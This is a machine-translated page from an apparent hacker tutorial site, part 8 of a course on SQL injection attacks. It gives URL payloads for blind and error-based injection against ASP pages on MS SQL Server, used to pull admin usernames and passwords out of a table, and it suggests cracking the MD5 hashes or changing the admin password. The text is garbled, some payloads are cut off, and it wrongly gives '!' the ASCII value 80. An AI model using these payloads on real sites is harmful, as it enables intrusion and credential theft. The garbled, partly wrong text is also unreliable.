Home | hacker invade | crack analyzes | hacker course | Exploit | encryption decipher | network management | System crack | the virus to be related | invades the examination | firewall
You are here: hacking technology > hacker course > Content
Hot Articles
SmoothWall Introduces Lo
Travel of the JSP+Oracle
Hacker skill: Gains Webs
Breaks through the Inter
MYSQL database injection
The Tomcat backstage tak
Breaks through the Inter
The hacker teaches you a
WinHex pursues the code
How does the hacker dest
How teaches you to take
The SQL injection revise
mssql SA jurisdiction ne
Microsoft SQL Server SA
The bored Css cross stat
Recommend Articles
The SQL injection revise
How does the hacker dest
The new military recruit
Union inquires the small
MYSQL database injection
Invades under new skill
How does the website scr
Smells searches works as
How in does the net seep
Microsoft SQL Server SA
A simple invasion, does
The mainstream raises th
The bored Css cross stat
The random combined comm
The hacker teaches you a
New Articles
Check Point offers compa
The malware spreads Cali
Full Disk Encryption pro
Cardholders should take
U.S. still more spam tha
Strong encryption L?solu
ConvexSoft DJ Audio Mixe
Few companies k?can be i
IT professionals can kee
k the media?can not by s
k the media?can not by s
Google Custom Search Eng
Users of the iPhone and
Gateshead College offers
Manchester obtained pass
The hacker teaches you anything is the SQL injection method attack(8)
  Add date: 07/16/2008   Publishing date: 07/16/2008   Hits: 13
Total 10 pages, Current page:8, Jump to page:
 

l guesses the solution user name and the password
Guessed that the user name and the password content most is commonly used is also the most effective method includes:
The ASCII code decodes the law word by word: Although this method speed is slow, but definitely is feasible. The basic mentality is guesses correctly the field the first length, then guesses correctly each value in turn. Guessed that the user name with guessed the password the method is the same, the following guessed that the user named example shows its process.
HTTP://xxx.xxx.xxx/abc.asp? p=YY and (select top&n… nbsp; from TestDB.dbo.admin) =X (X=1,2,3,4,5,… n, username is user famous field name, admin is table name), if x for some value i when abc.asp moves is normal, then i is a first user length. For example: When inputs  
HTTP://xxx.xxx.xxx/abc.asp? p=YY and (select top… e) from TestDB.dbo.admin) when =8 abc.asp moves normally, then a first user length is 8
HTTP://xxx.xxx.xxx/abc.asp? p=YY and (sel… ascii(substring(username, m,1)) from TestDB.dbo.admin) =n (m value, in 1 to previous step obtains between user famous length, when m=1,2,3,…When guessed that guesses separately 1,2,3rd,…Position value; the n value is 1~9, a~z, a~Z ASCII values, is also 1~128 between random values; admin is the system user account number table name), if n is some value i when abc.asp moves is normal, then i corresponds the ASCII code is a user some value. For example: When inputs
HTTP://xxx.xxx.xxx/abc.asp? p=YY and (sel… ascii(substring(username,3,1)) from TestDB.dbo.admin) when =80 abc.asp moves normally, then user third is P (P ASCII is 80);
HTTP://xxx.xxx.xxx/abc.asp? p=YY and (sel… ascii(substring(username,9,1)) from TestDB.dbo.admin) when =33 abc.asp moves normally, then user 9th is! (! ASCII is 80);
Guessed correctly after first user name and password, likewise, may guess correctly other all user name and the password. Attention: Sometimes obtains the password possibly is after way encryption and so on MD5 information, but also needs to use the special-purpose tool to carry on decoding. Or changes its password first, after using, changes again, sees the following explanation.
Simple method: Guessed that user uses
HTTP://xxx.xxx.xxx/abc.asp? p=YY and (select top 1… o.admin where username>1), flag is in a admin table field, username is the user famous field, this time abc.asp works unusually, but can obtain the Username value. With on similar method, may obtain second user, third user and so on, until table in all user. ? FFX,_? 2*S  
Guesses the user password: HTTP://xxx.xxx.xxx/abc.asp? p=YY and (select top 1&nb… B.dbo.admin where pwd>1), flag is in a admin table field, pwd is the password field, this time abc.asp works unusually, but can obtain the pwd value. With on similar method, may obtain a second user password, third user's password and so on, until table in all user's passwords. Sometimes the password is after the MD5 encryption, may change the password.

 
Other pages: : <<Prev * 1 * 2 * 3 * 4 * 5 * 6 * 7 * 8 * 9 * 10 * Next>>
Prev:The random combined command achieves exempts kills Next:The SQL weak password 1433 catch the chicken to meet the question

Comment:

Category: Home > hacker course
Home